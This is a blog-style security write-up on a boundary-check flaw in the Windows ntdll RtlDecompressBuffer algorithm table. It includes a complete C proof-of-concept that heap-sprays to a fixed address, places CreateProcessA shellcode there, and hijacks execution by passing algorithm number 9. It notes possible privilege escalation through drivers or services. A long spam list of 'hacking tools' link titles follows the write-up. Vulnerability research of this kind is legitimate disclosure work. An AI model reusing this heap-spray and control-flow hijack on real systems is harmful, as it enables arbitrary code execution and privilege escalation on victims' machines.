RtlDecompresBuffer Vulnerability

Introduction

The RtlDecompressBuffer is a WinAPI implemented on ntdll that is often used by browsers and applications and also by malware to decompress buffers compressed on LZ algorithms for example LZNT1.

The first parameter of this function is a number that represents the algorithm to use in the decompression, for example the 2 is the LZNT1. This algorithm switch is implemented as a callback table with the pointers to the algorithms, so the boundaries of this table must be controlled for avoiding situations where the execution flow is redirected to unexpected places, specially controlled heap maps.

The algorithms callback table







Notice the five nops at the end probably for adding new algorithms in the future.

The way to jump to this pointers depending on the algorithm number is:
call RtlDecompressBufferProcs[eax*4]

The bounrady checks

We control eax because is the algorithm number, but the value of eax is limited, let's see the boudary checks:

int  RtlDecompressBuffer(unsigned __int8 algorithm, int a2, int a3, int a4, int a5, int a6) {   int result; // eax@4    if ( algorithm & algorithm != 1 )   {     if ( algorithm & 0xF0 )       result = -1073741217;     else       result = ((int (__stdcall *)(int, int, int, int, int))RtlDecompressBufferProcs[algorithm])(a2, a3, a4, a5, a6);   }   else   {     result = -1073741811;   }   return result; }

Regarding that decompilation seems that we can only select algorithm number from 2 to 15, regarding that  the algorithm 9 is allowed and will jump to 0x90909090, but we can't control that addess.

let's check the disassembly on Win7 32bits:

• the movzx limits the boundaries to 16bits
• the test ax, ax avoids the algorithm 0
• the cmp ax, 1 avoids the algorithm 1
• the test al, 0F0h limits the boundary .. wait .. al?

Let's calc the max two bytes number that bypass the test al, F0h

unsigned int max(void) {
        __asm__("xorl %eax, %eax");
        __asm__("movb $0xff, %ah");
        __asm__("movb $0xf0, %al");
}

int main(void) {
        printf("max: %u\n", max());
}

The value is 65520, but the fact is that is simpler than that, what happens if we put the algorithm number 9? 

So if we control the algorithm number we can redirect the execution flow to 0x55ff8890 which can be mapped via spraying.

Proof of concept

This exploit code, tells to the RtlDecompresBuffer to redirect the execution flow to the address 0x55ff8890 where is a map with the shellcode. To reach this address the heap is sprayed creating one Mb chunks to reach this address.

The result on WinXP:

The result on Win7 32bits:

And the exploit code:

/*     ntdll!RtlDecompressBuffer() vtable exploit + heap spray     by @sha0coder  */  #include  #include  #include   #define KB  1024 #define MB  1024*KB #define BLK_SZ 4096 #define ALLOC 200 #define MAGIC_DECOMPRESSION_AGORITHM 9  // WinXP Calc shellcode from http://shell-storm.org/shellcode/files/shellcode-567.php /* unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93" "\xBF\x77\xFF\xD2\xCC" "\xE8\xF3\xFF\xFF\xFF" "\x63\x61\x6C\x63"; */  // https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html char *shellcode =        "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"        "\x45\x81\x3e\x43\x72\x65\x61\x75"        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"        "\x6c\x63\x89\xe2\x52\x52\x53\x53"        "\x53\x53\x53\x53\x52\x53\xff\xd7";   PUCHAR landing_ptr = (PUCHAR)0x55ff8b90; // valid for Win7 and WinXP 32bits  void fail(const char *msg) {   printf("%s\n\n", msg);   exit(1); }  PUCHAR spray(HANDLE heap) {   PUCHAR map = 0;    printf("Spraying ...\n");   printf("Aproximating to %p\n", landing_ptr);    while (map < landing_ptr-1*MB) {     map = HeapAlloc(heap, 0, 1*MB);   }    //map = HeapAlloc(heap, 0, 1*MB);    printf("Aproximated to [%x - %x]\n", map, map+1*MB);     printf("Landing adddr: %x\n", landing_ptr);   printf("Offset of landing adddr: %d\n", landing_ptr-map);    return map; }  void landing_sigtrap(int num_of_traps) {   memset(landing_ptr, 0xcc, num_of_traps); }  void copy_shellcode(void) {   memcpy(landing_ptr, shellcode, strlen(shellcode));  }  int main(int argc, char **argv) {   FARPROC RtlDecompressBuffer;   NTSTATUS ntStat;   HANDLE heap;   PUCHAR compressed, uncompressed;   ULONG compressed_sz, uncompressed_sz, estimated_uncompressed_sz;    RtlDecompressBuffer = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlDecompressBuffer");    heap = GetProcessHeap();    compressed_sz = estimated_uncompressed_sz = 1*KB;    compressed = HeapAlloc(heap, 0, compressed_sz);    uncompressed = HeapAlloc(heap, 0, estimated_uncompressed_sz);     spray(heap);   copy_shellcode();   //landing_sigtrap(1*KB);   printf("Landing ...\n");    ntStat = RtlDecompressBuffer(MAGIC_DECOMPRESSION_AGORITHM, uncompressed, estimated_uncompressed_sz, compressed, compressed_sz, &uncompressed_sz);    switch(ntStat) {     case STATUS_SUCCESS:       printf("decompression Ok!\n");       break;      case STATUS_INVALID_PARAMETER:       printf("bad compression parameter\n");       break;       case STATUS_UNSUPPORTED_COMPRESSION:       printf("unsuported compression\n");       break;      case STATUS_BAD_COMPRESSION_BUFFER:       printf("Need more uncompressed buffer\n");       break;      default:       printf("weird decompression state\n");       break;   }    printf("end.\n"); } 

The attack vector

 
 This API is called very often in the windows system, and also is called by browsers, but he attack vector is not common, because the apps that call this API trend to hard-code the algorithm number, so in a normal situation we don't control the algorithm number. But if there is a privileged application service or a driver that let to switch the algorithm number, via ioctl, config, etc. it can be used to elevate privileges on win7
 
 
 

Related news

1. How To Hack
2. Hacker Security Tools
3. Hack Tools Github
4. Blackhat Hacker Tools
5. Hacking Tools 2019
6. Pentest Tools For Mac
7. Pentest Automation Tools
8. Pentest Tools Open Source
9. Hacking Tools Windows 10
10. What Is Hacking Tools
11. Termux Hacking Tools 2019
12. Hacker Tools Windows
13. Hacking Tools For Games
14. Hacking Tools Windows 10
15. Hacking Tools 2020
16. What Is Hacking Tools
17. Pentest Tools Url Fuzzer
18. Pentest Tools Android
19. Black Hat Hacker Tools
20. Hack Tools For Ubuntu
21. Hacking Tools Github
22. What Are Hacking Tools
23. Hacker Tools Software
24. Hacking Tools 2019
25. Hack Tools For Windows
26. Pentest Tools Bluekeep
27. What Is Hacking Tools
28. What Are Hacking Tools
29. Computer Hacker
30. Hack Tools 2019
31. Hacking Apps
32. Free Pentest Tools For Windows
33. Physical Pentest Tools
34. Hacking Tools Name
35. Hack And Tools
36. Hacking Tools Pc
37. Tools For Hacker
38. Hacking Tools Free Download
39. How To Make Hacking Tools
40. Hacker
41. Black Hat Hacker Tools
42. Hack And Tools
43. Hack Tools
44. Hack Rom Tools
45. Pentest Tools Online
46. Pentest Tools For Android
47. Hack Tools Online
48. Hack Tool Apk
49. Hacking Tools Github
50. Hacker Tools For Pc
51. Nsa Hack Tools Download
52. Pentest Tools Website Vulnerability
53. Pentest Tools Nmap
54. Ethical Hacker Tools
55. Ethical Hacker Tools
56. Github Hacking Tools
57. Hacking Tools Software
58. Hacker Tool Kit
59. Hacking Tools For Beginners
60. Hacker Tools Mac
61. How To Install Pentest Tools In Ubuntu
62. Hack App
63. What Is Hacking Tools
64. Hacking Tools For Windows Free Download
65. Pentest Automation Tools
66. Hack Website Online Tool
67. Hacking Tools Software
68. Pentest Tools Online
69. Pentest Tools Download
70. Hacking App
71. Wifi Hacker Tools For Windows
72. Hack App
73. Pentest Tools Find Subdomains
74. Pentest Tools Download
75. Android Hack Tools Github
76. Kik Hack Tools
77. Hacking Tools For Kali Linux
78. Pentest Tools Framework
79. Beginner Hacker Tools
80. Pentest Tools For Android
81. Pentest Tools Find Subdomains
82. Bluetooth Hacking Tools Kali
83. Kik Hack Tools
84. Top Pentest Tools
85. Hackrf Tools
86. Pentest Tools Bluekeep
87. Hacker Tools Apk
88. Hacker Search Tools
89. Free Pentest Tools For Windows
90. Computer Hacker
91. Github Hacking Tools
92. Pentest Tools
93. What Are Hacking Tools
94. Hack Tools For Windows
95. Pentest Box Tools Download
96. Hack Tools Pc
97. Hack Tools
98. Hacking Tools
99. Hacker Tools Apk
100. Hacker Tools 2020
101. Hacking Tools Windows
102. Hacking Tools 2020
103. Pentest Reporting Tools
104. Hack Tools For Mac
105. Pentest Tools For Ubuntu
106. Hacker Tools
107. Hacker Techniques Tools And Incident Handling
108. Hack Tools For Games
109. Hacking Tools 2019
110. Blackhat Hacker Tools
111. Hack Apps
112. Hacker
113. Hacking Tools 2020
114. Hack Apps
115. Hacking Tools For Pc
116. Pentest Tools Website
117. Hack Tool Apk No Root
118. Hack Apps
119. Hacking Tools For Windows Free Download
120. Blackhat Hacker Tools
121. Hacker Techniques Tools And Incident Handling
122. Hacking App
123. Hacking Tools Kit
124. Tools For Hacker
125. Hacker Tools For Windows
126. Pentest Tools Url Fuzzer
127. Ethical Hacker Tools
128. Pentest Box Tools Download
129. Hacking Tools Pc
130. How To Make Hacking Tools
131. Hack Tools Mac
132. Hacker Tools For Ios
133. Pentest Tools Free
134. Hacking Tools Kit
135. Install Pentest Tools Ubuntu
136. Pentest Tools Apk
137. Hacker Tools For Windows
138. Pentest Tools Framework
139. Hacks And Tools
140. Hack Tool Apk No Root
141. Hacking Tools For Pc
142. Pentest Tools Review
143. Pentest Tools Website
144. Hack Tools Download
145. Pentest Reporting Tools
146. Pentest Tools Free
147. Hacker Techniques Tools And Incident Handling
148. Hacking Tools And Software
149. Hacking Tools Online
150. Pentest Tools Windows
151. Hak5 Tools
152. Pentest Tools Tcp Port Scanner
153. Growth Hacker Tools
154. Hacker Techniques Tools And Incident Handling
155. Hacking Tools For Games
156. Pentest Box Tools Download